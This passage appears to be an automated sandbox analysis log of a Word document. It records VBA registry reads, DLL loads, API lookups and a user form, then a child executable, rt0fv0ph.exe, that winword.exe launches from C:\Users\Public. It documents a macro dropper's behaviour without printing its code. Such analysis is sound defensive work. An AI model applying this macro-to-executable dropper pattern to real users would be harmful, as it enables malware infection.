Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = RequireDeclaration, data = 146, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = CompileOnDemand, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = BackGroundCompile, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = BreakOnAllErrors, data = 255, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = BreakOnServerErrors, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB True 3
Fn
Read Value HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 data = C:\Windows\system32\stdole2.tlb True 2
Fn
Read Value HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL True 2
Fn
Read Value HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2\9\win64 data = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL True 1
Fn
Read Value HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\2.0\0\win64 data = C:\Windows\system32\FM20.DLL True 1
Fn
Read Value HKEY_CLASSES_ROOT\Clsid\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\InprocServer32 value_name = ThreadingModel, data = 65 True 1
Fn
Read Value HKEY_CLASSES_ROOT\Clsid\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\Instance CLSID data = {C62A69F0-16DC-11CE-9E98-00AA00574A4F} False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = VbaCapability, data = 146 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = MdiMaximized, data = 240 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = GridWidth, data = 192 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = GridHeight, data = 192 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = ShowGrid, data = 192 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = AlignToGrid, data = 192 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = SaveBeforeRun, data = 192 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = ShowToolTips, data = 192 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = CollapseWindows, data = 192 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = UpgradeVBX, data = 192 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = ReadOnlyMode, data = 192 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = BackgroundProjectLoad, data = 192 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = VbaCapability, data = 1 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = FolderView, data = 192 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = Tool, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = PropertiesWindow, data = 4 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = UI, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = Dock, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = CtlsShowSelected, data = 192 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = DsnShowSelected, data = 192 False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = MainWindow, data = 0 False 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\Typelib\{0D452EE1-E08F-101A-852E-02608C4D0BB4} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\Typelib\{0D452EE1-E08F-101A-852E-02608C4D0BB4} - False 1
Fn
Module (173)
»
Operation Module Additional Information Success Count Logfile
Load Comctl32.dll base_address = 0x7fefb970000 True 1
Fn
Load C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL base_address = 0x7fedfd90000 True 1
Fn
Load C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL base_address = 0x7fef5d40000 True 1
Fn
Load OLEAUT32.DLL base_address = 0x7fefe910000 True 1
Fn
Load oleaut32.dll base_address = 0x7fefe910000 True 1
Fn
Load COMCTL32.DLL base_address = 0x7fefb970000 True 1
Fn
Load VBE7.DLL base_address = 0x7fee04b0000 True 10
Fn
Get Handle Unknown module name base_address = 0x13f850000 True 1
Fn
Get Handle MSI.DLL base_address = 0x7fef9b60000 True 1
Fn
Get Handle C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL base_address = 0x0 False 1
Fn
Get Handle c:\windows\system32\user32.dll base_address = 0x76df0000 True 1
Fn
Get Handle oleaut32.dll base_address = 0x7fefe910000 True 1
Fn
Get Filename - process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 True 4
Fn
Get Address Unknown module name function = MsiProvideQualifiedComponentA, address_out = 0x7fef9be3b3c True 1
Fn
Get Address Unknown module name function = MsiGetProductCodeA, address_out = 0x7fef9bda13c True 1
Fn
Get Address Unknown module name function = MsiReinstallFeatureA, address_out = 0x7fef9be1618 True 1
Fn
Get Address Unknown module name function = MsiProvideComponentA, address_out = 0x7fef9bdf088 True 1
Fn
Get Address Unknown module name function = MsoVBADigSigCallDlg, address_out = 0x7fedfe972c0 True 1
Fn
Get Address Unknown module name function = MsoVbaInitSecurity, address_out = 0x7fedfe060b0 True 1
Fn
Get Address Unknown module name function = MsoFIEPolicyAndVersion, address_out = 0x7fedfdb1a60 True 1
Fn
Get Address Unknown module name function = MsoFAnsiCodePageSupportsLCID, address_out = 0x7fedfe05f50 True 1
Fn
Get Address Unknown module name function = MsoFInitOffice, address_out = 0x7fedfdaf000 True 1
Fn
Get Address Unknown module name function = MsoUninitOffice, address_out = 0x7fedfd9e860 True 1
Fn
Get Address Unknown module name function = MsoFGetFontSettings, address_out = 0x7fedfd93fc0 True 1
Fn
Get Address Unknown module name function = MsoRgchToRgwch, address_out = 0x7fedfda2380 True 1
Fn
Get Address Unknown module name function = MsoHrSimpleQueryInterface, address_out = 0x7fedfd97b80 True 1
Fn
Get Address Unknown module name function = MsoHrSimpleQueryInterface2, address_out = 0x7fedfd97b20 True 1
Fn
Get Address Unknown module name function = MsoFCreateControl, address_out = 0x7fedfd98730 True 1
Fn
Get Address Unknown module name function = MsoFLongLoad, address_out = 0x7fedfed3260 True 1
Fn
Get Address Unknown module name function = MsoFLongSave, address_out = 0x7fedfed3280 True 1
Fn
Get Address Unknown module name function = MsoFGetTooltips, address_out = 0x7fedfda1f40 True 1
Fn
Get Address Unknown module name function = MsoFSetTooltips, address_out = 0x7fedfe06370 True 1
Fn
Get Address Unknown module name function = MsoFLoadToolbarSet, address_out = 0x7fedfdf4590 True 1
Fn
Get Address Unknown module name function = MsoFCreateToolbarSet, address_out = 0x7fedfd955b0 True 1
Fn
Get Address Unknown module name function = MsoHpalOffice, address_out = 0x7fedfda0240 True 1
Fn
Get Address Unknown module name function = MsoFWndProcNeeded, address_out = 0x7fedfd93d10 True 1
Fn
Get Address Unknown module name function = MsoFWndProc, address_out = 0x7fedfd96d30 True 1
Fn
Get Address Unknown module name function = MsoFCreateITFCHwnd, address_out = 0x7fedfd93d40 True 1
Fn
Get Address Unknown module name function = MsoDestroyITFC, address_out = 0x7fedfd9e6f0 True 1
Fn
Get Address Unknown module name function = MsoFPitbsFromHwndAndMsg, address_out = 0x7fedfd9df40 True 1
Fn
Get Address Unknown module name function = MsoFGetComponentManager, address_out = 0x7fedfd97bf0 True 1
Fn
Get Address Unknown module name function = MsoMultiByteToWideChar, address_out = 0x7fedfd9fcd0 True 1
Fn
Get Address Unknown module name function = MsoWideCharToMultiByte, address_out = 0x7fedfd98b20 True 1
Fn
Get Address Unknown module name function = MsoHrRegisterAll, address_out = 0x7fedfe92ef0 True 1
Fn
Get Address Unknown module name function = MsoFSetComponentManager, address_out = 0x7fedfda42c0 True 1
Fn
Get Address Unknown module name function = MsoFCreateStdComponentManager, address_out = 0x7fedfd93e20 True 1
Fn
Get Address Unknown module name function = MsoFHandledMessageNeeded, address_out = 0x7fedfd9ab10 True 1
Fn
Get Address Unknown module name function = MsoPeekMessage, address_out = 0x7fedfd9a7d0 True 1
Fn
Get Address Unknown module name function = MsoFCreateIPref, address_out = 0x7fedfd91550 True 1
Fn
Get Address Unknown module name function = MsoDestroyIPref, address_out = 0x7fedfd9e830 True 1
Fn
Get Address Unknown module name function = MsoChsFromLid, address_out = 0x7fedfd913d0 True 1
Fn
Get Address Unknown module name function = MsoCpgFromChs, address_out = 0x7fedfd96660 True 1
Fn
Get Address Unknown module name function = MsoSetLocale, address_out = 0x7fedfd91500 True 1
Fn
Get Address Unknown module name function = MsoFSetHMsoinstOfSdm, address_out = 0x7fedfd93dd0 True 1
Fn
Get Address Unknown module name function = MsoSetVbaInterfaces, address_out = 0x7fedfe971e0 True 1
Fn
Get Address Unknown module name function = MsoGetControlInstanceId, address_out = 0x7fedfe66d10 True 1
Fn
Get Address Unknown module name function = VbeuiFIsEdpEnabled, address_out = 0x7fedfed98e0 True 1
Fn
Get Address Unknown module name function = VbeuiEnterpriseProtect, address_out = 0x7fedfed9830 True 1
Fn
Get Address Unknown module name function = SysFreeString, address_out = 0x7fefe911320 True 1
Fn
Get Address Unknown module name function = LoadTypeLib, address_out = 0x7fefe91f1e0 True 1
Fn
Get Address Unknown module name function = RegisterTypeLib, address_out = 0x7fefe96caa0 True 1
Fn
Get Address Unknown module name function = QueryPathOfRegTypeLib, address_out = 0x7fefe9a1760 True 1
Fn
Get Address Unknown module name function = UnRegisterTypeLib, address_out = 0x7fefe9a20d0 True 2
Fn
Get Address Unknown module name function = OleTranslateColor, address_out = 0x7fefe93c760 True 1
Fn
Get Address Unknown module name function = OleCreateFontIndirect, address_out = 0x7fefe96ecd0 True 1
Fn
Get Address Unknown module name function = OleCreatePictureIndirect, address_out = 0x7fefe96e840 True 1
Fn
Get Address Unknown module name function = OleLoadPicture, address_out = 0x7fefe97f420 True 1
Fn
Get Address Unknown module name function = OleCreatePropertyFrameIndirect, address_out = 0x7fefe974ec0 True 1
Fn
Get Address Unknown module name function = OleCreatePropertyFrame, address_out = 0x7fefe979350 True 1
Fn
Get Address Unknown module name function = OleIconToCursor, address_out = 0x7fefe946e40 True 1
Fn
Get Address Unknown module name function = LoadTypeLibEx, address_out = 0x7fefe91a550 True 2
Fn
Get Address Unknown module name function = OleLoadPictureEx, address_out = 0x7fefe97f320 True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetSystemMetrics, address_out = 0x76e094f0 True 1
Fn
Get Address c:\windows\system32\user32.dll function = MonitorFromWindow, address_out = 0x76e05f08 True 1
Fn
Get Address c:\windows\system32\user32.dll function = MonitorFromRect, address_out = 0x76e02b00 True 1
Fn
Get Address c:\windows\system32\user32.dll function = MonitorFromPoint, address_out = 0x76dfab64 True 1
Fn
Get Address c:\windows\system32\user32.dll function = EnumDisplayMonitors, address_out = 0x76e05c30 True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetMonitorInfoA, address_out = 0x76dfa730 True 1
Fn
Get Address c:\windows\system32\user32.dll function = EnumDisplayDevicesA, address_out = 0x76dfa5b4 True 1
Fn
Get Address Unknown module name function = DispCallFunc, address_out = 0x7fefe912270 True 1
Fn
Get Address Unknown module name function = CreateTypeLib2, address_out = 0x7fefe99dbd0 True 1
Fn
Get Address Unknown module name function = VarDateFromUdate, address_out = 0x7fefe915c90 True 1
Fn
Get Address Unknown module name function = VarUdateFromDate, address_out = 0x7fefe916330 True 1
Fn
Get Address Unknown module name function = GetAltMonthNames, address_out = 0x7fefe9366c0 True 1
Fn
Get Address Unknown module name function = VarNumFromParseNum, address_out = 0x7fefe914710 True 1
Fn
Get Address Unknown module name function = VarParseNumFromStr, address_out = 0x7fefe9148f0 True 1
Fn
Get Address Unknown module name function = VarDecFromR4, address_out = 0x7fefe94b640 True 1
Fn
Get Address Unknown module name function = VarDecFromR8, address_out = 0x7fefe94b360 True 1
Fn
Get Address Unknown module name function = VarDecFromDate, address_out = 0x7fefe952640 True 1
Fn
Get Address Unknown module name function = VarDecFromI4, address_out = 0x7fefe9358a0 True 1
Fn
Get Address Unknown module name function = VarDecFromCy, address_out = 0x7fefe935820 True 1
Fn
Get Address Unknown module name function = VarR4FromDec, address_out = 0x7fefe94af20 True 1
Fn
Get Address Unknown module name function = GetRecordInfoFromTypeInfo, address_out = 0x7fefe96a0c0 True 1
Fn
Get Address Unknown module name function = GetRecordInfoFromGuids, address_out = 0x7fefe9a2160 True 1
Fn
Get Address Unknown module name function = SafeArrayGetRecordInfo, address_out = 0x7fefe935af0 True 1
Fn
Get Address Unknown module name function = SafeArraySetRecordInfo, address_out = 0x7fefe935a90 True 1
Fn
Get Address Unknown module name function = SafeArrayGetIID, address_out = 0x7fefe935a60 True 1
Fn
Get Address Unknown module name function = SafeArraySetIID, address_out = 0x7fefe935a30 True 1
Fn
Get Address Unknown module name function = SafeArrayCopyData, address_out = 0x7fefe9160b0 True 1
Fn
Get Address Unknown module name function = SafeArrayAllocDescriptorEx, address_out = 0x7fefe913e90 True 1
Fn
Get Address Unknown module name function = SafeArrayCreateEx, address_out = 0x7fefe969f80 True 1
Fn
Get Address Unknown module name function = VarFormat, address_out = 0x7fefe999b20 True 1
Fn
Get Address Unknown module name function = VarFormatDateTime, address_out = 0x7fefe999aa0 True 1
Fn
Get Address Unknown module name function = VarFormatNumber, address_out = 0x7fefe999990 True 1
Fn
Get Address Unknown module name function = VarFormatPercent, address_out = 0x7fefe999890 True 1
Fn
Get Address Unknown module name function = VarFormatCurrency, address_out = 0x7fefe999770 True 1
Fn
Get Address Unknown module name function = VarWeekdayName, address_out = 0x7fefe97b8d0 True 1
Fn
Get Address Unknown module name function = VarMonthName, address_out = 0x7fefe97b800 True 1
Fn
Get Address Unknown module name function = VarAdd, address_out = 0x7fefe9948e0 True 1
Fn
Get Address Unknown module name function = VarAnd, address_out = 0x7fefe999470 True 1
Fn
Get Address Unknown module name function = VarCat, address_out = 0x7fefe9996a0 True 1
Fn
Get Address Unknown module name function = VarDiv, address_out = 0x7fefe992fe0 True 1
Fn
Get Address Unknown module name function = VarEqv, address_out = 0x7fefe999cf0 True 1
Fn
Get Address Unknown module name function = VarIdiv, address_out = 0x7fefe998ff0 True 1
Fn
Get Address Unknown module name function = VarImp, address_out = 0x7fefe999c00 True 1
Fn
Get Address Unknown module name function = VarMod, address_out = 0x7fefe998e60 True 1
Fn
Get Address Unknown module name function = VarMul, address_out = 0x7fefe993690 True 1
Fn
Get Address Unknown module name function = VarOr, address_out = 0x7fefe9992d0 True 1
Fn
Get Address Unknown module name function = VarPow, address_out = 0x7fefe992e80 True 1
Fn
Get Address Unknown module name function = VarSub, address_out = 0x7fefe993f90 True 1
Fn
Get Address Unknown module name function = VarXor, address_out = 0x7fefe9991a0 True 1
Fn
Get Address Unknown module name function = VarAbs, address_out = 0x7fefe977c30 True 1
Fn
Get Address Unknown module name function = VarFix, address_out = 0x7fefe977a60 True 1
Fn
Get Address Unknown module name function = VarInt, address_out = 0x7fefe977890 True 1
Fn
Get Address Unknown module name function = VarNeg, address_out = 0x7fefe977ea0 True 1
Fn
Get Address Unknown module name function = VarNot, address_out = 0x7fefe999600 True 1
Fn
Get Address Unknown module name function = VarRound, address_out = 0x7fefe9776a0 True 1
Fn
Get Address Unknown module name function = VarCmp, address_out = 0x7fefe9983f0 True 1
Fn
Get Address Unknown module name function = VarDecAdd, address_out = 0x7fefe943070 True 1
Fn
Get Address Unknown module name function = VarDecCmp, address_out = 0x7fefe94d700 True 1
Fn
Get Address Unknown module name function = VarBstrCat, address_out = 0x7fefe94d890 True 1
Fn
Get Address Unknown module name function = VarCyMulI4, address_out = 0x7fefe92caf0 True 1
Fn
Get Address Unknown module name function = VarBstrCmp, address_out = 0x7fefe938a00 True 1
Fn
Get Address Unknown module name address_out = 0x7fedfd9fcd0 True 1
Fn
Get Address Unknown module name address_out = 0x0 False 1
Fn
Get Address Unknown module name function = RegisterTypeLibForUser, address_out = 0x7fefe966430 True 1
Fn
Get Address Unknown module name function = ImageList_Destroy, address_out = 0x7fefb9d07a4 True 1
Fn
Get Address Unknown module name function = ImageList_GetIconSize, address_out = 0x7fefb9d1010 True 1
Fn
Get Address Unknown module name function = InitCommonControls, address_out = 0x7fefbaa8b5c True 1
Fn
Get Address Unknown module name function = ImageList_LoadImageA, address_out = 0x7fefb9d01a8 True 1
Fn
Get Address Unknown module name function = ImageList_Create, address_out = 0x7fefb9d00fc True 1
Fn
Get Address Unknown module name function = ImageList_SetOverlayImage, address_out = 0x7fefb9d0a70 True 1
Fn
Get Address Unknown module name function = ImageList_AddMasked, address_out = 0x7fefb9d0b60 True 1
Fn
Get Address Unknown module name function = ImageList_GetImageInfo, address_out = 0x7fefb9d1180 True 1
Fn
Get Address Unknown module name function = ImageList_Draw, address_out = 0x7fefb9d0cd8 True 1
Fn
Get Address Unknown module name function = ImageList_DrawEx, address_out = 0x7fefb9d0bdc True 1
Fn
Get Address Unknown module name function = PropertySheetA, address_out = 0x7fefb9b5c64 True 1
Fn
Get Address Unknown module name function = DestroyPropertySheetPage, address_out = 0x7fefb9af018 True 1
Fn
Get Address Unknown module name function = CreatePropertySheetPageA, address_out = 0x7fefb9afce8 True 1
Fn
Get Address Unknown module name function = 595, address_out = 0x7fee07c2a6c True 1
Fn
Get Address Unknown module name function = 584, address_out = 0x7fee07c3440 True 1
Fn
Get Address Unknown module name function = 608, address_out = 0x7fee061ae28 True 1
Fn
Get Address Unknown module name function = 619, address_out = 0x7fee061d5a8 True 1
Fn
Get Address Unknown module name function = 717, address_out = 0x7fee08148e0 True 1
Fn
Get Address Unknown module name function = 598, address_out = 0x7fee04b1da4 True 1
Fn
Get Address Unknown module name function = 645, address_out = 0x7fee05515c4 True 1
Fn
Get Address Unknown module name function = 529, address_out = 0x7fee0619920 True 1
Fn
Get Address Unknown module name function = 648, address_out = 0x7fee054fd40 True 1
Fn
Get Address Unknown module name function = 716, address_out = 0x7fee07f24c8 True 1
Fn
Window (25)
»
Operation Window Name Additional Information Success Count Logfile
Create - class_name = ThunderMain, wndproc_parameter = 0 True 1
Fn
Create Microsoft Visual Basic for Applications wndproc_parameter = 0 True 1
Fn
Create - class_name = mdiclient, wndproc_parameter = 1466256 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - class_name = SysTreeView32, wndproc_parameter = 0 True 1
Fn
Create - class_name = ToolsPalette, wndproc_parameter = 0 True 1
Fn
Create Properties wndproc_parameter = 0 True 1
Fn
Create Properties wndproc_parameter = 0 True 1
Fn
Create Properties class_name = ComboBox, wndproc_parameter = 0 True 1
Fn
Create Properties class_name = SysTabControl32, wndproc_parameter = 0 True 1
Fn
Create Properties class_name = ListBox, wndproc_parameter = 0 True 1
Fn
Create Properties class_name = Button, wndproc_parameter = 0 True 1
Fn
Create Properties class_name = Edit, wndproc_parameter = 0 True 1
Fn
Create Properties class_name = ListBox, wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create UserForm1 wndproc_parameter = 0 True 1
Fn
Create UserForm1 wndproc_parameter = 0 True 1
Fn
Set Attribute Properties class_name = ListBox, index = 18446744073709551604, new_long = 0 True 1
Fn
Set Attribute Properties class_name = ListBox, index = 18446744073709551600, new_long = 18446744071637565443 True 1
Fn
Set Attribute UserForm1 index = 18446744073709551596, new_long = 262401 True 1
Fn
Set Attribute - index = 0, new_long = 0 True 1
Fn
Set Attribute UserForm1 index = 18446744073709551596, new_long = 262401 True 1
Fn
Keyboard (1)
»
Operation Additional Information Success Count Logfile
Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
System (20)
»
Operation Additional Information Success Count Logfile
Get Cursor x_out = 749, y_out = 196 True 2
Fn
Get Time type = System Time, time = 2018-05-29 01:41:41 (UTC) True 1
Fn
Get Time type = Ticks, time = 213502 True 1
Fn
Get Time type = Local Time, time = 2018-05-29 01:41:49 (Local Time) True 3
Fn
Get Time type = Local Time, time = 2018-05-29 01:41:50 (Local Time) True 9
Fn
Get Info type = Operating System True 2
Fn
Get Info type = Operating System True 2
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String name = DDRYBUR False 1
Fn
Process #2: rt0fv0ph.exe
9240 84
»
Information Value
ID #2
File Name c:\users\public\rt0fv0ph.exe
Command Line "C:\Users\Public\RT0FV0pH.exe"
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:03:25, Reason: Child Process
Unmonitor End Time: 00:04:55, Reason: Terminated by Timeout
Monitor Duration 00:01:30
OS Process Information
»
Information Value
PID 0x870
Parent PID 0xa60 (c:\program files\microsoft office\root\office16\winword.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 880
0x 8A0
0x 8D0
0x 1C0
0x 8E0
0x 7BC
0x 968
0x 9A0
0x 940
0x 9B0
0x 93C
0x 490
0x A94
0x 324
0x 79C
0x 7A0
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000050000 0x00050000 0x00050fff Private Memory Readable, Writable True False False -
private_0x0000000000050000 0x00050000 0x0005ffff Private Memory Readable, Writable True False False -
private_0x0000000000060000 0x00060000 0x00060fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000060000 0x00060000 0x00067fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000070000 0x00070000 0x00070fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000070000 0x00070000 0x00076fff Pagefile Backed Memory Readable True False False -
private_0x0000000000080000 0x00080000 0x00080fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000090000 0x00090000 0x00091fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000000a0000 0x000a0000 0x000a0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000000b0000 0x000b0000 0x000effff Private Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x0000000000110000 0x00110000 0x00110fff Private Memory Readable, Writable True False False -
private_0x0000000000120000 0x00120000 0x00120fff Private Memory Readable, Writable True False False -
private_0x0000000000130000 0x00130000 0x00130fff Private Memory Readable, Writable True False False -
private_0x0000000000140000 0x00140000 0x00140fff Private Memory Readable, Writable True False False -
private_0x0000000000150000 0x00150000 0x00150fff Private Memory Readable, Writable True False False -
private_0x0000000000160000 0x00160000 0x00160fff Private Memory Readable, Writable True False False -
private_0x0000000000170000 0x00170000 0x00170fff Private Memory Readable, Writable True False False -
private_0x0000000000180000 0x00180000 0x00180fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False -
private_0x0000000000210000 0x00210000 0x00236fff Private Memory Readable, Writable True False False -
private_0x0000000000210000 0x00210000 0x0029ffff Private Memory Readable, Writable True False False -
private_0x0000000000210000 0x00210000 0x0024ffff Private Memory Readable, Writable True False False -
private_0x0000000000210000 0x00210000 0x00226fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000230000 0x00230000 0x00230fff Private Memory Readable, Writable True False False -
private_0x0000000000240000 0x00240000 0x00240fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000240000 0x00240000 0x0024ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000240000 0x00240000 0x00247fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000250000 0x00250000 0x00257fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000250000 0x00250000 0x00251fff Pagefile Backed Memory Readable True False False -
private_0x0000000000260000 0x00260000 0x0029ffff Private Memory Readable, Writable True False False -
private_0x00000000002a0000 0x002a0000 0x002dffff Private Memory Readable, Writable True False False -
private_0x00000000002e0000 0x002e0000 0x002effff Private Memory Readable, Writable True False False -
windowsshell.manifest 0x002f0000 0x002f0fff Memory Mapped File Readable False False False -
index.dat 0x002f0000 0x002fbfff Memory Mapped File Readable, Writable True False False -
pagefile_0x0000000000300000 0x00300000 0x00301fff Pagefile Backed Memory Readable True False False -
private_0x0000000000310000 0x00310000 0x0038ffff Private Memory Readable, Writable True False False -
rsaenh.dll 0x00390000 0x003cbfff Memory Mapped File Readable False False False -
pagefile_0x0000000000390000 0x00390000 0x003d2fff Pagefile Backed Memory Readable, Writable True False False -
index.dat 0x00390000 0x00397fff Memory Mapped File Readable, Writable True False False -
index.dat 0x003a0000 0x003abfff Memory Mapped File Readable, Writable True False False -
private_0x00000000003b0000 0x003b0000 0x003b2fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000003c0000 0x003c0000 0x003c2fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000003d0000 0x003d0000 0x003d0fff Private Memory Readable, Writable True False False -
pagefile_0x00000000003d0000 0x003d0000 0x003d0fff Pagefile Backed Memory Readable True False False -
rt0fv0ph.exe 0x00400000 0x00460fff Memory Mapped File Readable, Writable, Executable True True False
...
private_0x0000000000470000 0x00470000 0x005dffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000470000 0x00470000 0x0054efff Pagefile Backed Memory Readable True False False -
private_0x0000000000550000 0x00550000 0x005cffff Private Memory Readable, Writable True False False -
